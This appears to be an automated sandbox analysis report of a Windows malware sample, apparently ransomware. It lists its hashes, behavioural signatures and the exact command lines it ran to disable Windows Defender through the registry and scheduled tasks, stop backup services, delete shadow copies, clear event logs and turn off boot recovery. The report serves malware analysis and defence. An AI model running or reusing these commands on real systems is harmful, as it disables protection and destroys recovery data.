Analysis
- max time kernel: 56s
- max time network: 14s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 12-01-2022 13:50
Static task: static1
Behavioral task: behavioral1
Sample: 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe
Resource: win7-en-20211208
General
- Target: 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe
- Size: 2.8MB
- MD5: eaca98262691a07d6251902bcbdc1083
- SHA1: 64cda1eb126efe6f2217a5a8a86baac17e09554d
- SHA256: 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402
- SHA512: d564fabffd1af3c798d3df293f7e945decb68243e0e015445ca470091c0fc1db8bcf7e1f8947d00791b3073e578f9edc50dbe1418672ccc71d9c130a34cb00ca
Malware Config
Signatures
- Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
  Uses mpcmdrun utility to delete all AV definitions.
  Processes: MpCmdRun.exe (PID 1188)
- Modifies security service (2 TTPs, 1 IoC)
  Processes: reg.exe, set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"
- Clears Windows event logs (1 TTP)
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  Processes: bcdedit.exe (PID 1396), bcdedit.exe (PID 752)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Drops file in Program Files directory (64 IoCs)
  Processes:
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe (PID 1708)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe (PID 1956), powershell.exe (PID 1500), 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe (PID 1668)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes:
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes:
Processes
- C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe (PID 1668)
  Command line: "C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe"
  Signatures: Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 1548)
    Command line: net.exe stop "NetMsmqActivator" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 648)
      Command line: C:\Windows\system32\net1 stop "NetMsmqActivator" /y
  - C:\Windows\system32\net.exe (PID 1328)
    Command line: net.exe stop "SamSs" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1632)
      Command line: C:\Windows\system32\net1 stop "SamSs" /y
  - C:\Windows\system32\net.exe (PID 1380)
    Command line: net.exe stop "SDRSVC" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1072)
      Command line: C:\Windows\system32\net1 stop "SDRSVC" /y
  - C:\Windows\system32\net.exe (PID 664)
    Command line: net.exe stop "SstpSvc" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1332)
      Command line: C:\Windows\system32\net1 stop "SstpSvc" /y
  - C:\Windows\system32\net.exe (PID 452)
    Command line: net.exe stop "UI0Detect" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 752)
      Command line: C:\Windows\system32\net1 stop "UI0Detect" /y
  - C:\Windows\system32\net.exe (PID 956)
    Command line: net.exe stop "VSS" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1092)
      Command line: C:\Windows\system32\net1 stop "VSS" /y
  - C:\Windows\system32\net.exe (PID 1052)
    Command line: net.exe stop "wbengine" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1488)
      Command line: C:\Windows\system32\net1 stop "wbengine" /y
  - C:\Windows\system32\net.exe (PID 1100)
    Command line: net.exe stop "WebClient" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1532)
      Command line: C:\Windows\system32\net1 stop "WebClient" /y
  - C:\Windows\system32\sc.exe (PID 1660)
    Command line: sc.exe config "NetMsmqActivator" start= disabled
  - C:\Windows\system32\sc.exe (PID 984)
    Command line: sc.exe config "SamSs" start= disabled
  - C:\Windows\system32\sc.exe (PID 1744)
    Command line: sc.exe config "SDRSVC" start= disabled
  - C:\Windows\system32\sc.exe (PID 572)
    Command line: sc.exe config "SstpSvc" start= disabled
  - C:\Windows\system32\sc.exe (PID 1636)
    Command line: sc.exe config "UI0Detect" start= disabled
  - C:\Windows\system32\sc.exe (PID 1148)
    Command line: sc.exe config "VSS" start= disabled
  - C:\Windows\system32\sc.exe (PID 1984)
    Command line: sc.exe config "wbengine" start= disabled
  - C:\Windows\system32\sc.exe (PID 1760)
    Command line: sc.exe config "WebClient" start= disabled
  - C:\Windows\system32\reg.exe (PID 1312)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1580)
    Command line: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  - C:\Windows\system32\reg.exe (PID 1680)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 516)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1632)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 1560)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1964)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 916)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 944)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 872)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1828)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1532)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  - C:\Windows\system32\reg.exe (PID 1176)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 1844)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 1712)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\reg.exe (PID 1936)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  - C:\Windows\system32\schtasks.exe (PID 584)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  - C:\Windows\system32\schtasks.exe (PID 900)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  - C:\Windows\system32\schtasks.exe (PID 1592)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  - C:\Windows\system32\schtasks.exe (PID 268)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  - C:\Windows\system32\schtasks.exe (PID 1480)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  - C:\Windows\system32\reg.exe (PID 892)
    Command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  - C:\Windows\system32\reg.exe (PID 812)
    Command line: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  - C:\Windows\system32\reg.exe (PID 1772)
    Command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  - C:\Windows\system32\reg.exe (PID 1496)
    Command line: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  - C:\Windows\system32\reg.exe (PID 1752)
    Command line: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  - C:\Windows\system32\reg.exe (PID 1696)
    Command line: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  - C:\Windows\system32\reg.exe (PID 676)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 716)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1980)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 340)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\system32\reg.exe (PID 1216)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    Signatures: Modifies security service
  - C:\Windows\system32\reg.exe (PID 1256)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1708 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:328 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1940 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:964 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1552 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1396 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:752 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:520
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1188 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1728
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1956 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1188
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1500
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5 c015d76fd1f7a457aaebce0d13c2536f
SHA1 5e8948252f436f59f06609e965a9902f9bc19593
SHA256 6d36bdc3d258c6a88907f13c074e87af6dd8b6bd1cfcad8617e1b00919750264
SHA512 c2fc649b05792922ca20650145544b65b43e20410c3a81d7e9c39947ded3b5702f9d67bf5c834d3cd5e390938b928cbd789f55041f2cf7eccf54d1ae1ff138b0